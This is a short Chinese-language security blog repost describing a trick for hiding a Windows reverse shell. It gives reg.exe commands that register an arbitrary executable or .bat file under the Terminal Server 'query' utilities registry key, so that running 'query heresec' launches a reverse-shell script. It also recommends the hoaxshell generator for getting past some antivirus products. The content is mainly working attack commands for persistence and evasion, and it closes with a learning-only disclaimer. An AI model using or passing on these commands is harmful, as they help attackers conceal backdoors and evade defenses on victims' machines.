小技巧 | 用一条命令来隐藏反向Shell
2023-5-27 09:42:0 Author: 黑白之道(查看原文) 阅读量:49 收藏

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Utilities\query 

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

添加一条,打开计算器。

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Utilities\query" /v heresec /t REG_MULTI_SZ /d0\01\0heresec\0calc.exe

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。

https://github.com/t3l3machus/hoaxshell

将命令写入一个bat脚本中,然后添加注册表后执行。

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Utilities\query" /v heresec /t REG_MULTI_SZ /d 0\01\0heresec\0C:\Windows\System32\spool\drivers\color\1.batquery heresec

只需执行命令query heresec即可运行反弹shell脚本。

还能怎么用,再联想一下。

文章来源:关注安全技术

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650570590&idx=4&sn=e3fc0ef930db82b30fcff91ae139d76d&chksm=83bd1abab4ca93acf9eba246150a9e05cbff8982109199c9c2921eaddd26976443e530b0c3ef#rd
如有侵权请联系:admin#unsafe.sh